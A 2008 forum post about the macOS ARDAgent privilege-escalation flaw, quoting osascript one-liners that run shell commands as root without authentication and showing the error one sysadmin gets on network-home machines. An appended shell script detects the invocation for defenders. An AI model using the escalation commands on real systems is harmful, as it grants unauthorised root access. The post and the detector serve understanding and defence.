Post 302207304 by afriend on Thursday 19th of June 2008 02:05:31 PM
ARD Agent vulnerability

Today an anonymous Slashdot user posted this little shell command that uses the ARDAgent to gain root access without ever needing to authenticate.

The script is:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

It can be used to do things like:
osascript -e 'tell app "ARDAgent" to do shell script "scutil --set ComputerName SomeName"'
that would normally require authentication.

It has been tested by quite a few people, and has been found to work only if you are physically at a computer and it's logged in.

However, where I work we use network shares as our home folders, and this hack doesn't seem to work. I just wanted to make sure that there was no way it would work.

When I run the command:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

I get:
execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)


Does anyone think it's possible?
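
For defenders, one way to spot the invocation shown in the post in collected process command lines. This is an added example, not part of the original post; the one-command-line-per-input-line format and the function names are assumptions, and the sample lines are constructed.

```shell
#!/bin/sh
# Added example: flag osascript invocations that ask ARDAgent to run a
# shell command, i.e. the pattern shown in the post.
# Assumed input: one process command line per line (for example exported
# from process auditing); adapt the parsing to your own log format.

# Constructed sample command lines, not captured from a real host.
sample_cmdlines() {
cat <<'EOF'
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
osascript -e 'tell application "Finder" to get name of startup disk'
/usr/bin/osascript -e 'tell application "ARDAgent" to do shell script "scutil --set ComputerName SomeName"'
osascript -e 'tell app "ARDAgent"' -e 'do shell script "whoami"' -e 'end tell'
grep ARDAgent /var/log/system.log
EOF
}

# Print every input line where all three conditions hold:
#   1. the command is osascript (bare or with a path prefix),
#   2. the script addresses ARDAgent ("tell app" or "tell application",
#      with plain or backslash-escaped double quotes),
#   3. the script uses "do shell script".
flag_ardagent_osascript() {
    grep -Ei '(^|[/[:space:]])osascript[[:space:]]' |
    grep -Ei 'tell[[:space:]]+app(lication)?[[:space:]]+\\?"ARDAgent\\?"' |
    grep -Ei 'do[[:space:]]+shell[[:space:]]+script'
}

# Number of flagged lines on stdin; prints 0 when nothing matches.
count_flagged() {
    { flag_ardagent_osascript || true; } | wc -l | tr -d ' '
}

# Stand-alone run: show which of the constructed lines are flagged.
sample_cmdlines | flag_ardagent_osascript
```

The Finder line and the plain `grep` line are not flagged, because each fails one of the three conditions.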
 
